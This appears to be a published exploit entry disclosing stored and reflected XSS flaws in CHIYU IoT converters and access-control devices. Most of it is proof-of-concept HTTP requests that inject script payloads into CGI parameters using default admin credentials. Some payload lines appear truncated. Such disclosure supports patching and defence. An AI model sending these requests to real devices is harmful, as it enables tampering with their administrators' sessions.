# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021 # Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC # CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643 # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. #1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices CVE ID: CVE-2021-31250 CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250 ============= PoC 01 =============== Affected parameter: TF_submask Component: if.cgi Payload: "> HTTP Request: GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/ap_tcps.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_submask) 4. Submit the request and observe payload execution ============= PoC 02 =============== Affected parameter: TF_hostname=Component: dhcpc.cgi Payload: /"> HTTP request and response: HTTP Request: GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/wan_dc.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (dhcpc.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_hostname) 4. Submit the request and observe payload execution ============= PoC 03 =============== Affected parameter: TF_servicename=Component: ppp.cgi Payload: "> GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1 Host: 192.168.187.143 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.143/wan_pe.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (ppp.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_servicename) 4. Submit the request and observe payload execution ============= PoC 04 =============== Affected parameter: TF_port=Component: man.cgi Payload: /"> GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (man.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_port) 4. Submit the request and observe payload execution #2: Unauthenticated XSS in several CHIYU IoT devices CVE ID: CVE-2021-31641 Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641 Component: any argument passed via URL that results in an HTTP-404 Payload: http://ip/ Steps to reproduce: 1. Navigate to the webpage of the vulnerable device 2. On the web-browsers, you need to append the payload after the IP address (see payload above) 3. Submit the request and observe payload execution #3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices CVE ID: CVE-2021-31643 Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643 Affected parameter: username= Component: if.cgi Payload: "> HTTP request - SEMAC Web Ver7.2 GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh=; remote=00000000 Upgrade-Insecure-Requests: 1 HTTP request - BIOSENSE-III-COMBO(M1)(20000) GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh= Upgrade-Insecure-Requests: 1 Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (username) 4. Submit the request and observe payload execution